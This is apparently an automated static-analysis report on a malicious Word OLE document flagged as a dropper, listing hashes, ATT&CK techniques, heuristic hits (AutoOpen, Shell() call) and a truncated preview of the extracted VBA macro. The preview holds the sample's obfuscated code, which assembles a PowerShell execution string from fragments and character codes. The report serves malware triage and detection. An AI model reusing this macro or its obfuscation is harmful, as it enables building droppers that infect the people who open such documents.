Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5406329cd04f810f…

MALICIOUS

Office (OLE)

Size: 89.8 KB | Created: 2018-06-28 11:59:00 | Authoring application: Microsoft Office Word | First seen: 2019-08-04
MD5: cc6334aa5ebc5feaaf5efc080e6b3bb7
SHA-1: e23c8166363831aa5b4dcc0f6d5c3f797a81573c
SHA-256: 5406329cd04f810f36efab7d7d1e5a29c1375521acfb7012ad3b65379501d266
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059 Command and Scripting Interpreter; T1059.005 Visual Basic

The sample is a malicious Office document containing a VBA macro. The macro uses the Shell() function, indicating an attempt to execute arbitrary commands. The script assembles its payload from concatenated string fragments, among them 'sShellId[1]' and 'SHEl', which appear to be parts of a command-execution payload. The ClamAV detection 'Doc.Dropper.Agent-6595092-0' further supports its classification as a dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6595092-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6595092-0
  • VBA macros detected [medium] (OLE_VBA_MACROS, 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only macro documents, and documents whose source extraction failed, where no visible source is available.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface; by itself it is not an attribution to a downloader or a parser CVE.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8658 bytes
SHA-256: cb58971e950b67c5e987ddf9c9777a02b92e83f3ad0f8f7fd181ce7a8e57bd02
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "aEswBrswCjiowW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MBbZWjKCb"
Function hsiTYDTUZfB()
On Error Resume Next
ckbXWA _
= 11096 + Atn(7081) / 91562 / _
Round(31855) / 6674 / CInt(LTXRD)
nawUNs = ChrB(20375 + _
Sin(YofiKi * CLng(BUmSf + 58772) _
 + 91739 _
+ NwQkt))
tMEBmXjY = "HELL" + "     " + "     " + "       " + "     " + "         " + "        " + "   ." + Chr(40) + " $" + "sHellId[1"
TwXpq _
= 33038 + Atn(93636) / 78103 / _
Round(15590) / 44639 / CInt(NpcRXR)
UAJwk = ChrB(98961 + _
Sin(TsBkW * CLng(HQXFrH + 79350) _
 + 40055 _
+ VNMPi))
hTXRLUAG = "]" + Chr(43) + "$SHEl" + "lID[13]" + Chr(43) + "'" + "x'" + Chr(41) + " " + Chr(40) + " " + Chr(34) + " " + "$" + Chr(40) + " Se" + "T-VarIa" + "BLE '" + "oFs'  " + "''" + Chr(41) + Chr(34) + " " + Chr(43) + " [STRIN"
pTHph _
= 21579 + Atn(31041) / 86946 / _
Round(99755) / 40973 / CInt(YQWYv)
lacwR = ChrB(43546 + _
Sin(QbkCfw * CLng(VQGiYt + 90772) _
 + 78782 _
+ rXXkfj))
ssdLSvfPk = "G]" + Chr(40) + " [CH" + "ar[]]" + Chr(40) + "2" + " , 92" + ",64 , 6" + "4, 27 " + ", 72,67," + " 81 ,"
wsZJb _
= 78626 + Atn(13435) / 41645 / _
Round(46867) / 94220 / CInt(ZFaNND)
qHKrAC = ChrB(16745 + _
Sin(pkYtmv * CLng(DmKFnK + 62099) _
 + 18245 _
+ FbMVjL))
Xziir = "11 ," + "73,6" + "8 , " + "76 , 6" + "7 ,69 ," + " 82, " + "6, 104, 6" + "7 , " + "82, 8, "
JUAobN _
= 13032 + Atn(85756) / 45094 / _
Round(937) / 58225 / CInt(WzfKms)
oDIPZ = ChrB(20519 + _
Sin(ZlYpmN * CLng(GOYmGE + 79825) _
 + 60382 _
+ infjn))
LKzVAzH = "113,67" + " , 6" + "8 , 1" + "01, 74 ," + "79,67, " + "72 , 82,2" + "9 , 2, 82" + " , 87 , " + "98 ,27, "
aRZdhW _
= 51412 + Atn(3338) / 10733 / _
Round(50858) / 56960 / CInt(oUUhNQ)
PiGYf = ChrB(76480 + _
Sin(IlZct * CLng(LlLHQJ + 61786) _
 + 14147 _
+ NSLdbB))
RujLTLYb = "1 ,78 , " + "82 , " + "82, 86" + ", 85 ,2" + "8 , 9 " + ", 9,84 ," + " 73 " + ", 69 ,"
zAZPK _
= 46479 + Atn(10862) / 38492 / _
Round(86706) / 88880 / CInt(UNpcdj)
SCJMRD = ChrB(70688 + _
Sin(iVoMC * CLng(LwoYC + 58849) _
 + 37072 _
+ jqOVUL))
HYAZPASdmJd = " 77 , 72" + " , 84," + "73,74, 74" + " ,67 , 82" + ", 69 ," + "73 ,8 , "
rlpfdJ _
= 97675 + Atn(1112) / 70737 / _
Round(68555) / 41935 / CInt(wpkfjr)
JPADaC = ChrB(61924 + _
Sin(WSwvjZ * CLng(rjwjY + 4580) _
 + 24254 _
+ DpjAWz))
ivHLVoK = "82 ,73" + ",86 , " + "9, 64" + ", 79 ,74," + " 67 , 9" + " ,94," + " 94, 6"
LhirCd _
= 81509 + Atn(65186) / 27897 / _
Round(55881) / 95093 / CInt(chmomF)
zAhzSa = ChrB(93520 + _
Sin(zOuBJ * CLng(aHRRrX + 82533) _
 + 2729 _
+ kDbYk))
NXLfWJ = "9 ,69" + " ,69, 75," + "75, 75 " + ", 8 ,67" + " ,94" + " , 67" + ", 1 " + ", 8,11" + "7 , 86" + ",74 , 7"
hsiTYDTUZfB = tMEBmXjY + hTXRLUAG + ssdLSvfPk + Xziir + LKzVAzH + RujLTLYb + HYAZPASdmJd + ivHLVoK + NXLfWJ
RAuvu _
= 578 + Atn(90122) / 57692 / _
Round(64324) / 21696 / CInt(FMtTU)
nwBZVX = ChrB(89552 + _
Sin(kvwwvr * CLng(MBjNz + 12936) _
 + 27875 _
+ fdjFbR))
End Function
Function XKaEmww()
On Error Resume Next
IiPcnb _
= 65585 + Atn(81342) / 91677 / _
Round(56646) / 99337 / CInt(KEwhl)
NtKMG = ChrB(39772 + _
Sin(ZPWwl * CLng(SQGnQ + 63436) _
 + 36998 _
+ biLkj))
uRnhGqlQQQ = "9 ,82 ," + " 14 ,1 " + ",102, 1, " + "15,29 ," + " 2 ,113" + ", 74 , 74" + " ,6, 27" + ", 6,1, 1" + "9 , 1" + "8, 19" + " ,1 " + ",29 ,2 "
tEcjw _
= 96366 + Atn(73207) / 27367 / _
Round(46892) / 38639 / CInt(bvINLL)
JLjwEQ = ChrB(60809 + _
Sin(SPlOz * CLng(WUaVmm + 98841) _
 + 76386 _
+ Eslsol))
ZOqLromGc = ", 64 ," + " 87 ," + " 113 ,27" + " , 2" + " , 67" + ",72,80 ," + " 28,8" + "2 , 6" + "7 ,7" + "5 , 86"
qPSRa _
= 45995 + Atn(37270) / 94554 / _
Round(369) / 23615 / CInt(wfWcJ)
TEahs = ChrB(48851 + _
Sin(uWjcE * CLng(YqOHZ + 42692) _
 + 92287 _
+ BwBdUa))
ARwwL = ", 13 ," + " 1 , " + "122,1 ," + "13 , " + "2, 113,7" + "4, 7" + "4 ,
... (truncated)